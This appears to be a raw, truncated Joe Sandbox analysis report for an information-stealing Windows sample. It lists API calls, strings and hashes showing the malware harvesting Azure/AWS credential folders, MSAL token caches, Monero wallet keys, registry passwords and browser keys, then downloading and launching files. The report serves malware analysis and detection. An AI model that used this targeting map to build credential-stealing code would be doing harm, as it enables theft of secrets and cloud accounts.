                                • Opcode Fuzzy Hash: 26b44ce7e1045f8840a5c56a5a91d38c64286ab64a5d02d3683a91d9e8fbcffd
                                • Instruction Fuzzy Hash: 7D81FBB1950118AFEB28DB54CC95FEEB7B8FF48700F008299E509A6180DF716B89CF95
                                APIs
                                  • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00C44DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00C44DCD
                                  • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C4492C
                                  • Part of subcall function 00C44910: FindFirstFileA.KERNEL32(?,?), ref: 00C44943
                                • lstrcat.KERNEL32(?,00000000), ref: 00C44E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00C44E59
                                  • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FDC), ref: 00C44971
                                  • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FE0), ref: 00C44987
                                  • Part of subcall function 00C44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C44B7D
                                  • Part of subcall function 00C44910: FindClose.KERNEL32(000000FF), ref: 00C44B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00C44EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C44EE5
                                  • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C449B0
                                  • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C508D2), ref: 00C449C5
                                  • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C449E2
                                  • Part of subcall function 00C44910: PathMatchSpecA.SHLWAPI(?,?), ref: 00C44A1E
                                  • Part of subcall function 00C44910: lstrcat.KERNEL32(?,019FF2E0), ref: 00C44A4A
                                  • Part of subcall function 00C44910: lstrcat.KERNEL32(?,00C50FF8), ref: 00C44A5C
                                  • Part of subcall function 00C44910: lstrcat.KERNEL32(?,?), ref: 00C44A70
                                  • Part of subcall function 00C44910: lstrcat.KERNEL32(?,00C50FFC), ref: 00C44A82
                                  • Part of subcall function 00C44910: lstrcat.KERNEL32(?,?), ref: 00C44A96
                                  • Part of subcall function 00C44910: CopyFileA.KERNEL32(?,?,00000001), ref: 00C44AAC
                                  • Part of subcall function 00C44910: DeleteFileA.KERNEL32(?), ref: 00C44B31
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 6c9518ee65fa18c193bf0bbed5a190b471b58521494ec746e15cdec868f38c77
                                • Instruction ID: 5b7216df55eab44218b037bc92060e1e23b28892ce8d3d26a38a21c4f1040a20
                                • Opcode Fuzzy Hash: 6c9518ee65fa18c193bf0bbed5a190b471b58521494ec746e15cdec868f38c77
                                • Instruction Fuzzy Hash: 8841767A9402046BD754F7B0DC4BFED7338ABA4701F444464BA4AA60C1EEB49BCDDB92
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C4906C
                                Strings
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 6a70c9083a62d0b9846de7b2c33636ea74cd36e5fec9d6b9040a3447aad30326
                                • Instruction ID: 0c4975aa578897efcbc270441f062e2a61be49fdf1c2f49e99e521e1a1946bdc
                                • Opcode Fuzzy Hash: 6a70c9083a62d0b9846de7b2c33636ea74cd36e5fec9d6b9040a3447aad30326
                                • Instruction Fuzzy Hash: 5F71EC71910208AFDB14EFE5DC89FEEB7B8FB88700F148518F519A7290DB74A945CB61
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00C431C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00C4335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00C434EA
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: cd798cefcd8475cb59476299800749aebc8d7806e224502a7f0651cdaec88e15
                                • Instruction ID: 7da1bb2cbfbf591d0023178cdbfae83a4c8c3167be822fdb97b8955d97e0433d
                                • Opcode Fuzzy Hash: cd798cefcd8475cb59476299800749aebc8d7806e224502a7f0651cdaec88e15
                                • Instruction Fuzzy Hash: D412EC71850108AAEB19FBA0DC92FEDB778BF64300F504169F50666191EF742B8EDF62
                                APIs
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C36280: InternetOpenA.WININET(00C50DFE,00000001,00000000,00000000,00000000), ref: 00C362E1
                                  • Part of subcall function 00C36280: StrCmpCA.SHLWAPI(?,019FF380), ref: 00C36303
                                  • Part of subcall function 00C36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C36335
                                  • Part of subcall function 00C36280: HttpOpenRequestA.WININET(00000000,GET,?,019FECB8,00000000,00000000,00400100,00000000), ref: 00C36385
                                  • Part of subcall function 00C36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C363BF
                                  • Part of subcall function 00C36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C363D1
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45318
                                • lstrlen.KERNEL32(00000000), ref: 00C4532F
                                  • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00C45364
                                • lstrlen.KERNEL32(00000000), ref: 00C45383
                                • lstrlen.KERNEL32(00000000), ref: 00C453AE
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 28cc2e83db00074d80275a24d89ce337da83a11853b90a7489891ec5d43c0e62
                                • Instruction ID: 82a16b80d9e0f919edabf88b2efa201ae8084617ff3f7c9b81d888f7441f5989
                                • Opcode Fuzzy Hash: 28cc2e83db00074d80275a24d89ce337da83a11853b90a7489891ec5d43c0e62
                                • Instruction Fuzzy Hash: B8511D309501489FEB18FF61CD96AED7779FF50305F504028F80A6A592EF346B49EB62
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 59207f6f1d4cc8cf782338ce894cd51fb6da9b71edb2c73949a0e1f31a647701
                                • Instruction ID: c947811efebcd574545e8557fa3f7b0a602ee49436955ed11d3271447a372e45
                                • Opcode Fuzzy Hash: 59207f6f1d4cc8cf782338ce894cd51fb6da9b71edb2c73949a0e1f31a647701
                                • Instruction Fuzzy Hash: DCC197B59401199BCB14EF60DC89FEE7379FB94304F044598F50AA7142EA70AEC9DF91
                                APIs
                                  • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00C442EC
                                • lstrcat.KERNEL32(?,019FEB68), ref: 00C4430B
                                • lstrcat.KERNEL32(?,?), ref: 00C4431F
                                • lstrcat.KERNEL32(?,019FD710), ref: 00C44333
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C48D90: GetFileAttributesA.KERNEL32(00000000,?,00C31B54,?,?,00C5564C,?,?,00C50E1F), ref: 00C48D9F
                                  • Part of subcall function 00C39CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C39D39
                                  • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                  • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                  • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                  • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                  • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                  • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                  • Part of subcall function 00C493C0: GlobalAlloc.KERNEL32(00000000,00C443DD,00C443DD), ref: 00C493D3
                                • StrStrA.SHLWAPI(?,019FEC58), ref: 00C443F3
                                • GlobalFree.KERNEL32(?), ref: 00C44512
                                  • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39AEF
                                  • Part of subcall function 00C39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C34EEE,00000000,?), ref: 00C39B01
                                  • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39B2A
                                  • Part of subcall function 00C39AC0: LocalFree.KERNEL32(?,?,?,?,00C34EEE,00000000,?), ref: 00C39B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 00C444A3
                                • StrCmpCA.SHLWAPI(?,00C508D1), ref: 00C444C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C444D2
                                • lstrcat.KERNEL32(00000000,?), ref: 00C444E5
                                • lstrcat.KERNEL32(00000000,00C50FB8), ref: 00C444F4
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: fcb577e93b406913adf0af6a552d2aadc93eb4d2757540c9e6e998220b146ec6
                                • Instruction ID: 11981d2950816bbfff9d737a14cc3b6e35c6f5f8fdc9bbb3937375e85b18818a
                                • Opcode Fuzzy Hash: fcb577e93b406913adf0af6a552d2aadc93eb4d2757540c9e6e998220b146ec6
                                • Instruction Fuzzy Hash: 0A714976910208ABDB14FBE0DC8AFEE7379BB88300F144598F619A7181DA74DB49DF91
                                APIs
                                  • Part of subcall function 00C312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C312B4
                                  • Part of subcall function 00C312A0: RtlAllocateHeap.NTDLL(00000000), ref: 00C312BB
                                  • Part of subcall function 00C312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C312D7
                                  • Part of subcall function 00C312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C312F5
                                  • Part of subcall function 00C312A0: RegCloseKey.ADVAPI32(?), ref: 00C312FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3134F
                                • lstrlen.KERNEL32(?), ref: 00C3135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00C31377
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019FE738,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00C31465
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                  • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                  • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                  • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                  • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                  • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 00C314EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 242b84a372e33620fb656bef2fe4f24161b08e584776e7eb570f9dad9ebd2fd9
                                • Instruction ID: ef4a98fda5c8cf0317f077661f7d80d09302db3216ddeb37c736e91a14bfd6b2
                                • Opcode Fuzzy Hash: 242b84a372e33620fb656bef2fe4f24161b08e584776e7eb570f9dad9ebd2fd9
                                • Instruction Fuzzy Hash: 235140B1D501195BDB15FB60DD96FED733CFB54304F4041A8B60AA2082EE706B89DFA6
                                APIs
                                  • Part of subcall function 00C372D0: memset.MSVCRT ref: 00C37314
                                  • Part of subcall function 00C372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C3733A
                                  • Part of subcall function 00C372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C373B1
                                  • Part of subcall function 00C372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C3740D
                                  • Part of subcall function 00C372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00C37452
                                  • Part of subcall function 00C372D0: HeapFree.KERNEL32(00000000), ref: 00C37459
                                • lstrcat.KERNEL32(00000000,00C517FC), ref: 00C37606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C37648
                                • lstrcat.KERNEL32(00000000, : ), ref: 00C3765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C3768F
                                • lstrcat.KERNEL32(00000000,00C51804), ref: 00C376A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C376D3
                                • lstrcat.KERNEL32(00000000,00C51808), ref: 00C376ED
                                • task.LIBCPMTD ref: 00C376FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: :
                                • API String ID: 3191641157-3653984579
                                • Opcode ID: 677fdfa3b470d61204f2baceefb6cdad8e85f10cb3fd17617b79460da8a5c0a9
                                • Instruction ID: fd1d8de8a0d17569764f0871819d0fe360e7d1cd5d56ec7bff19bcafefe700e0
                                • Opcode Fuzzy Hash: 677fdfa3b470d61204f2baceefb6cdad8e85f10cb3fd17617b79460da8a5c0a9
                                • Instruction Fuzzy Hash: C93150B1910109DFCB18EBE5DC9ADFF7374BB84302F184128F516B7290DA34A98ADB52
                                APIs
                                • memset.MSVCRT ref: 00C37314
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C3733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C373B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C3740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00C37452
                                • HeapFree.KERNEL32(00000000), ref: 00C37459
                                • task.LIBCPMTD ref: 00C37555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: Password
                                • API String ID: 2808661185-3434357891
                                • Opcode ID: 9728c9a5ffc86faca335009bca6ce4d049e1857b64864f081d0afe2775fcbdf8
                                • Instruction ID: 756f05378c85ebf78d3230cf521e63f6e00fb8d53770a5fe5f47f8627688b06a
                                • Opcode Fuzzy Hash: 9728c9a5ffc86faca335009bca6ce4d049e1857b64864f081d0afe2775fcbdf8
                                • Instruction Fuzzy Hash: E6614CB591426C9BDB24DB50CC45BDAB7B8BF48300F0481E9E689A6141DFB06FC9DFA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,019FE970,00000000,?,00C50E2C,00000000,?,00000000), ref: 00C48130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C48137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00C48158
                                • __aulldiv.LIBCMT ref: 00C48172
                                • __aulldiv.LIBCMT ref: 00C48180
                                • wsprintfA.USER32 ref: 00C481AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: 9efbcb82c332ea1edb9d289069a7886c1e77ac5c81817d5c1ef1ea3cef47be72
                                • Instruction ID: b26e331c527d6f9934d28da6c6bbf4ce3c8b60836d57779488e19202c3acbed1
                                • Opcode Fuzzy Hash: 9efbcb82c332ea1edb9d289069a7886c1e77ac5c81817d5c1ef1ea3cef47be72
                                • Instruction Fuzzy Hash: 9A214AB1E44208ABDB00DFD5CC49FAEB7B8FB44B00F104219F605BB280C77869058BA5
                                APIs
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                  • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                • InternetOpenA.WININET(00C50DF7,00000001,00000000,00000000,00000000), ref: 00C3610F
                                • StrCmpCA.SHLWAPI(?,019FF380), ref: 00C36147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00C3618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00C361B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00C361DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C3620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00C36249
                                • InternetCloseHandle.WININET(?), ref: 00C36253
                                • InternetCloseHandle.WININET(00000000), ref: 00C36260
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: 2092ae5410f79a95e8d1959e21641dcf64d7530abc59464741640a31aaa6a88f
                                • Instruction ID: 4eb638dcbab83ef26619851c053c695037dca09495b3b33779b1afb116db84ea
                                • Opcode Fuzzy Hash: 2092ae5410f79a95e8d1959e21641dcf64d7530abc59464741640a31aaa6a88f
                                • Instruction Fuzzy Hash: 40518FB0950208AFEB24DF51DC45BEE77B8FB44301F1080A8E609A71C0DB756A89CF95
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                • lstrlen.KERNEL32(00000000), ref: 00C3BC9F
                                  • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00C3BCCD
                                • lstrlen.KERNEL32(00000000), ref: 00C3BDA5
                                • lstrlen.KERNEL32(00000000), ref: 00C3BDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
